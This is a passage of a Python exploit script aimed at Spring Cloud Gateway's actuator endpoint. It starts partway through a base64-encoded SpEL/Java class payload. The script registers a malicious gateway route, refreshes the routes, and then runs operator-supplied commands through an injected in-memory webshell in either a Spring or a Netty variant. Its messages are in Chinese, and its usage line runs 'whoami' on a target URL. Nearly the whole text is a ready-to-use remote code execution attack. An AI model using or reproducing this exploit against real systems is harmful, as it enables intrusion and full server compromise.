aWFIwZVM5aWRXWm1aWEl2UW5sMFpVSjFaanNwVmdFQUxHbHZMMjVsZEhSNUwyaGhibVJzWlhJdlkyOWtaV012YUhSMGNDOUdkV3hzU0hSMGNGSmxjM0J2Ym5ObEFRQXJhVzh2Ym1WMGRIa3ZhR0Z1Wkd4bGNpOWpiMlJsWXk5b2RIUndMMGgwZEhCSVpXRmtaWEpPWVcxbGN3RUFERU5QVGxSRlRsUmZWRmxRUlFFQUcweHBieTl1WlhSMGVTOTFkR2xzTDBGelkybHBVM1J5YVc1bk93RUFWU2hNYW1GMllTOXNZVzVuTDBOb1lYSlRaWEYxWlc1alpUdE1hbUYyWVM5c1lXNW5MMDlpYW1WamREc3BUR2x2TDI1bGRIUjVMMmhoYm1Sc1pYSXZZMjlrWldNdmFIUjBjQzlJZEhSd1NHVmhaR1Z5Y3pzQkFBMTNjbWwwWlVGdVpFWnNkWE5vQVFBMEtFeHFZWFpoTDJ4aGJtY3ZUMkpxWldOME95bE1hVzh2Ym1WMGRIa3ZZMmhoYm01bGJDOURhR0Z1Ym1Wc1JuVjBkWEpsT3dFQUptbHZMMjVsZEhSNUwyTm9ZVzV1Wld3dlEyaGhibTVsYkVaMWRIVnlaVXhwYzNSbGJtVnlBUUFGUTB4UFUwVUJBQ2hNYVc4dmJtVjBkSGt2WTJoaGJtNWxiQzlEYUdGdWJtVnNSblYwZFhKbFRHbHpkR1Z1WlhJN0FRQWVhVzh2Ym1WMGRIa3ZZMmhoYm01bGJDOURhR0Z1Ym1Wc1JuVjBkWEpsQVFBTFlXUmtUR2x6ZEdWdVpYSUJBRklvVEdsdkwyNWxkSFI1TDNWMGFXd3ZZMjl1WTNWeWNtVnVkQzlIWlc1bGNtbGpSblYwZFhKbFRHbHpkR1Z1WlhJN0tVeHBieTl1WlhSMGVTOWphR0Z1Ym1Wc0wwTm9ZVzV1Wld4R2RYUjFjbVU3QUNFQUZ3QStBQUVBUHdBQUFBVUFBUUJBQUVFQUFRQkNBQUFBTHdBQkFBRUFBQUFGS3JjQUFiRUFBQUFDQUVNQUFBQUdBQUVBQUFBT0FFUUFBQUFNQUFFQUFBQUZBRVVBUmdBQUFBa0FSd0JJQUFFQVFnQUFBY01BQkFBS0FBQUF0UklDU3hJREVnUUR2UUFGdGdBR1RDc0V0Z0FIS3dFRHZRQUl0Z0FKVFFNK0hTeTRBQXFpQUljc0hiZ0FDem9FR1FUR0FIVVpCTFlBRExZQURSSU90Z0FQbVFCbEdRUzJBQXdTRUxZQUVUb0ZHUVVFdGdBU0dRVVpCTFlBRXpvR0dRYTJBQXkyQUJRU0ZiWUFFVG9IR1FjRXRnQVNHUWNaQnJZQUV6b0lHUWkyQUF5MkFCUzJBQlFTRnJZQUVUb0pHUWtFdGdBU0dRa1pDTHNBRjFtM0FCaTJBQmtTR2t1RUF3R24vM2VuQUFkTUVoeExLckFBQVFBREFLd0Fyd0FiQUFNQVF3QUFBRm9BRmdBQUFCQUFBd0FTQUE4QUV3QVVBQlFBSGdBV0FDZ0FGd0F2QUJnQVJBQVpBRkFBR2dCV0FCc0FYd0FjQUc0QUhRQjBBQjRBZlFBZkFJOEFJQUNWQUNFQW93QWlBS1lBRmdDc0FDY0Fyd0FsQUxBQUpnQ3pBQ2dBUkFBQUFIQUFDd0JRQUZZQVNRQktBQVVBWHdCSEFFc0FUQUFHQUc0QU9BQk5BRW9BQndCOUFDa0FUZ0JNQUFnQWp3QVhBRThBU2dBSkFDOEFkd0JRQUV3QUJBQWdBSXdBVVFCU0FBTUFEd0NkQUZNQVZBQUJBQjRBamdCVkFFd0FBZ0N3QUFNQVZnQlhBQUVBQXdDeUFGZ0FXUUFBQUZvQUFBQWVBQVgvQUNBQUJBY0FXd2NBWEFjQVhRRUFBUHNBaGZnQUJVSUhBRjREQUFFQVh3QmdBQUlBUWdBQUFIWUFCUUFGQUFBQUhDeTVBQjBCQURvRUdRUVNIaElmdXdBWFdiY0FHTGtBSUFRQVY3RUFBQUFDQUVNQUFBQU9BQU1BQUFBdUFBZ0FNQUFiQURFQVJBQUFBRFFBQlFBQUFCd0FSUUJHQUFBQUFBQWNBR0VBWWdBQkFBQUFIQUJqQUdRQUFnQUFBQndBWlFCbUFBTUFDQUFVQUdjQWFBQUVBR2tBQUFBTkF3QmhBQUFBWXdBQUFHVUFBQUFCQUdvQWF3QURBRUlBQUFFUUFBUUFCZ0FBQUdFc3dRQWhtUUJVTE1BQUlVNHR1UUFpQVFBU0k3WUFKSmtBTnkyNUFDSUJBQklqdGdBbE9nUzdBQ1padUFBbkdRUzJBQ2kyQUNtM0FDb1NLN1lBTExZQUxUb0ZLaXNaQmJJQUxyY0FMN0duQUFvNkJCa0V0Z0F3S3l5NUFERUNBRmV4QUFFQURBQk5BRkVBR3dBREFFTUFBQUF5QUF3QUFBQTNBQWNBT0FBTUFEb0FHZ0E3QUNjQVBBQkRBRDRBVFFBL0FFNEFRd0JSQUVFQVV3QkNBRmdBUlFCZ0FFWUFSQUFBQUVnQUJ3QW5BQ2NBYkFCWkFBUUFRd0FMQUcwQVdRQUZBRk1BQlFCV0FGY0FCQUFNQUV3QWJnQnZBQU1BQUFCaEFFVUFSZ0FBQUFBQVlRQndBSEVBQVFBQUFHRUFXQUJNQUFJQVdnQUFBQThBQS93QVRnY0Fja0lIQUY3NkFBWUFjd0FBQUFRQUFRQWJBR2tBQUFBSkFnQndBQUFBV0FBQUFBSUFkQUIxQUFJQVFnQUFBSlFBQmdBRkFBQUFOcnNBTWxteUFETXRMTElBTkxnQU5iY0FOam9FR1FTNUFEY0JBTElBT0JJNXRnQTZWeXNaQkxrQU93SUFzZ0E4dVFBOUFnQlhzUUFBQUFJQVF3QUFBQklBQkFBQUFFb0FGQUJMQUNRQVRBQTFBRTBBUkFBQUFEUUFCUUFBQURZQVJRQkdBQUFBQUFBMkFIQUFjUUFCQUFBQU5nQjJBRmtBQWdBQUFEWUFkd0I0QUFNQUZBQWlBSGtBZWdBRUFHa0FBQUFOQXdCd0FBQUFkZ0FBQUhjQUFBQUJBSHNBQUFBQ0FIdz0nKSxuZXcgamF2YXgubWFuYWdlbWVudC5sb2FkaW5nLk1MZXQobmV3IGphdmEubmV0LlVSTFswXSxUKGphdmEubGFuZy5UaHJlYWQpLmN1cnJlbnRUaHJlYWQoKS5nZXRDb250ZXh0Q2xhc3NMb2FkZXIoKSkpLmRvSW5qZWN0KCl9IiwKICAgICAgICAiX2dlbmtleV8xIjogIi8ke3BhdGh9IgogICAgICB9CiAgICB9CiAgXSwKICAidXJpIjogImh0dHBzOi8vd3lhLnBsIiwKICAib3JkZXIiOiAwCn0='''
 7 | 
 8 | 
 9 | def sendspring(url):
10 | 
11 | 	rsp=requests.post(url+"/actuator/gateway/routes/new_route", data=base64.b64decode(springshell).decode(), headers=headers)
12 | 	if rsp.status_code!=201:
13 | 		print("注入失败")
14 | 		exit(0)
15 | 
16 | def sendnetty(url):
17 | 	rsp = requests.post(url+"/actuator/gateway/routes/new_route",data=base64.b64decode(nettyshell).decode(),headers=headers)
18 | 	if rsp.status_code!=201:
19 | 		print("注入失败")
20 | 		exit(0)
21 | 
22 | def refresh(url):
23 | 
24 | 	rsp =requests.post(url+"/actuator/gateway/refresh",data="{}",headers=headers)
25 | 	print(rsp.status_code,rsp.text)
26 | 
27 | def echospring(url,cmd):
28 | 	headers={"Connection": "close"}
29 | 	rsp=requests.get(url+"/GYWA?cmd={}".format(cmd), headers=headers)
30 | 	print("shell地址:"+url+"/GYWA?cmd={}".format(cmd))
31 | 	print("无响应命令则注入失败:")
32 | 	print(rsp.text)
33 | 
34 | def echonetty(url,cmd):
35 | 	headers={"Connection": "close", "GYWA": cmd}
36 | 	rsp = requests.get(url,headers=headers)
37 | 	print("shell地址:"+url+ "/任意路径,头部加上GYWA:cmd即可".format(cmd))
38 | 	print("无响应命令则注入失败:")
39 | 	print(rsp.text)
40 | 
41 | 
42 | 
43 | # sendnetty(url)
44 | 
45 | if __name__ == '__main__':
46 | 
47 | 	if len(sys.argv)<4:
48 | 		print("xx.py typeshell(spring or netty) cmd")
49 | 		print("eg:xx.py http://127.0.0.1:8080 netty whoami")
50 | 		exit()
51 | 	url=sys.argv[1]
52 | 	typeshell=sys.argv[2]
53 | 	cmd=sys.argv[3]
54 | 	if typeshell=="netty":
55 | 		sendnetty(url)
56 | 		refresh(url)
57 | 		echonetty(url,cmd)
58 | 	else:
59 | 		sendspring(url)
60 | 		refresh(url)
61 | 		echospring(url,cmd)
62 | 
63 | 


--------------------------------------------------------------------------------